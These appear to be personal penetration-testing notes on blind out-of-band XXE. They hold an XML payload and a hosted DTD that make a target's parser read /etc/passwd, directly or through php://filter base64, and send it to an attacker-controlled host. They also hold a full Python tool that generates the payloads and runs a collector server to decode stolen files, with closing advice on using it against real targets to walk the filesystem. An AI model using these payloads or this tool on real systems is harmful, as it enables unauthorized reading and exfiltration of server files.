xct's notes
XXE

Common XXE

Out-of-band (blind) XXE: the target's parser fetches a DTD from our host and then sends a file from the target's filesystem to us. This is the XML document submitted to the target (the root element must actually reference &send;, otherwise the exfil request never fires):

<?xml version="1.0"?>
<!DOCTYPE xct [
<!ELEMENT xct ANY>
<!ENTITY % dtd SYSTEM "http://<attackerip>/payload.dtd">
%dtd;]>
<xct>&send;</xct>
payload.dtd, hosted on <attackerip>. %file; is expanded inside the entity value while the external DTD is parsed, and %all; then defines the general entity send; when the document references &send;, the parser requests the collect URL with the file contents appended (watch the web server log):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<attackerip>/collect=%file;'>">
%all;
Instead of file:// we can also use php://filter here (on PHP targets), e.g. php://filter/convert.base64-encode/resource=/etc/passwd: the content comes back base64-encoded, so newlines and characters like < or & don't break the URL or the DTD, and we decode it on our side. You probably want to script this for enumerating a target.
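Added example (my own code, not part of the original notes): a small Python script that generates both payloads above for a given file path and runs the collector, i.e. an HTTP server that serves payload.dtd and decodes whatever lands on /collect=. The attacker host/port (127.0.0.1 on an ephemeral port), the root element name xct and the sample /etc/passwd content are assumptions for the demo; run_demo() stands in for the vulnerable target by fetching the DTD and firing the exfil request the way the parser would after expanding %file; through php://filter.

```python
"""Out-of-band XXE payload generator + collector (added example, not xct's code).
Assumed for the demo: attacker host 127.0.0.1 on an ephemeral port, root element
'xct', and a constructed /etc/passwd sample (SAMPLE_PASSWD)."""
import base64
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def build_xml(attacker, root="xct"):
    """XML document sent to the target: pulls in our DTD and references &send;."""
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE {root} [\n"
        f"<!ELEMENT {root} ANY>\n"
        f'<!ENTITY % dtd SYSTEM "http://{attacker}/payload.dtd">\n'
        "%dtd;]>\n"
        f"<{root}>&send;</{root}>\n"
    )


def build_dtd(attacker, path, php_filter=True):
    """payload.dtd served from our host. With php_filter=True the file is
    base64-encoded by the target, so newlines/'<'/'&' cannot break the URL."""
    source = f"php://filter/convert.base64-encode/resource={path}" if php_filter else f"file://{path}"
    return (
        f'<!ENTITY % file SYSTEM "{source}">\n'
        f'<!ENTITY % all "<!ENTITY send SYSTEM \'http://{attacker}/collect=%file;\'>">\n'
        "%all;\n"
    )


def decode_loot(raw, php_filter=True):
    """Recover the file from the request path after '/collect='. Some parsers
    percent-encode the expanded entity when building the URL, so unquote first."""
    data = urllib.parse.unquote(raw)
    return base64.b64decode(data).decode(errors="replace") if php_filter else data


class Collector(BaseHTTPRequestHandler):
    path_to_read = "/etc/passwd"   # file we want from the target
    php_filter = True
    loot = []                      # every exfiltrated file, in arrival order

    def do_GET(self):
        host = self.headers.get("Host", "127.0.0.1")  # callback address for the DTD
        if self.path == "/payload.dtd":
            body = build_dtd(host, self.path_to_read, self.php_filter).encode()
            self._reply(200, body, "application/xml-dtd")
        elif self.path.startswith("/collect="):
            Collector.loot.append(decode_loot(self.path[len("/collect="):], self.php_filter))
            self._reply(200, b"")
        else:
            self._reply(404, b"")

    def _reply(self, code, body, ctype="text/plain"):
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_collector(host="127.0.0.1", port=0):
    """Bind the collector (port 0 = pick a free one) and serve in the background."""
    srv = ThreadingHTTPServer((host, port), Collector)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


# Constructed sample of what the target would read; not a real system's file.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def run_demo():
    """Stand-in for the vulnerable target: fetch the DTD as the parser would,
    then issue the exfil request with %file; expanded (base64 of SAMPLE_PASSWD).
    Returns the file the collector recovered."""
    srv = start_collector()
    attacker = f"127.0.0.1:{srv.server_address[1]}"
    try:
        dtd = urllib.request.urlopen(f"http://{attacker}/payload.dtd").read().decode()
        if "%all;" not in dtd:
            raise RuntimeError("served DTD is missing the %all; reference")
        b64 = base64.b64encode(SAMPLE_PASSWD.encode()).decode()
        urllib.request.urlopen(f"http://{attacker}/collect={b64}").read()
        return Collector.loot[-1]
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(build_xml("<attackerip>"))
    print(run_demo())
```

Against a real target, start the collector on a reachable IP, submit build_xml(attacker) wherever the application accepts XML, and change Collector.path_to_read between runs to walk the filesystem; with php_filter=False only files without newlines or XML-special characters survive the trip.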